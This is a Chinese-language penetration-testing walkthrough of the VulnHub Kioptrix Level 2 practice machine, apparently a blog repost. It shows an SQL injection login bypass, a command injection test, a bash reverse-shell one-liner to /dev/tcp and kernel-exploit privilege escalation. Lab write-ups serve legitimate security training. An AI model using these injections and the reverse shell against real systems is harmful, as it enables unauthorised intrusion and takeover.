• VulnHub——Kioptrix Level 2


    简介

    靶机较为简单,通过登录页SQL注入漏洞登录管理页面,然后利用命令注入漏洞获得Web Shell,最后利用内核漏洞提升至root权限。

    信息收集

    使用fping -agq 192.168.0.0/24探测局域网内其它主机,发现目标主机IP地址,如图:

    然后使用nmap --min-rate 10000 -T5 -A -sC -p1-65535 192.168.0.130快速扫描目标主机开启的端口与服务,发现开启22,80,111,443,631,868和3306端口,分别运行着OpenSSH 3.9p1,Apache httpd 2.0.20,rpcbind,https,CUPS1.1,RPC和MySQL服务,操作系统可能为CentOS 2.6,如图:

    使用SearchSploit搜索openssh 漏洞如图:

    使用Google搜索631端口运行的服务CUPS/1.1漏洞,发现存在缓冲区溢出、本地权限提升和任意文件覆盖漏洞,使用SearchSploit查找漏洞利用程序,如图:

    漏洞发现

    使用dirbuster扫描80端口和631端口目录时未发现有用的信息,使用nikto扫描漏洞时也未发现存在SQL注入漏洞,虽然631端口允许PUT方法,但是由于目录没有权限,故无法上传文件。使用漏洞数据库中openssh的漏洞利用程序无法获得shell。然后访问80端口Web服务,发现是个简陋的登录页面,如图:

    在源代码中发现网页提交登录信息到index.php,且有一句注释像是提示,如图:

    SQL注入漏洞

    使用单引号测试SQL注入发现页面没有任何变化,尝试使用用户名‘=’和密码‘=’登录成功,如图:

    可见这里存在SQL注入,使用sqlmap测试时,在level=3,risk=2的条件下发现uname参数存在SQL注入漏洞,如图:

    但是权限较低,无法通过SQL注入获取root用户密码和shell。

    命令注入漏洞

    在登录后的页面测试是否存在命令注入漏洞,使用127 & id测试,成功执行命令,如图:

     漏洞利用

    利用命令注入漏洞通过bash -i >& /dev/tcp/192.168.0.128/4444 0>&1反弹shell,如图:

    权限提升

    查看内核版本,发现是2.6.9-55,如图:

    使用searchsploit查找centos 2.x的内核提权漏洞利用程序,如图:

    将9545.c上传到目标主机,编译后执行,成功获得root权限,如图:

    同样,将9542.c上传到目标主机,编译后执行,成功获得root权限,如图:

    总结

    该靶机没有花太多时间,在SQL注入以及尝试使用其他方法提权上花的时间比较多,但最终未找到除内核漏洞提权外的其它方法。

  • 相关阅读:
    571B. Minimization(Codeforces Round #317)
    java的死锁学习
    算法——大整数乘法
    从头认识java-15.7 Map(3)-介绍HashMap的工作原理-get方法
    软硬件之共生之道——一千零一夜的启发
    Java系列之JNDI
    the solution of CountNonDivisible by Codility
    qml
    日历日历日历
    项目总结——传说中的反射居然是这个样子
  • 原文地址:https://www.cnblogs.com/hzcya1995/p/13302350.html
Copyright © 2020-2023  润新知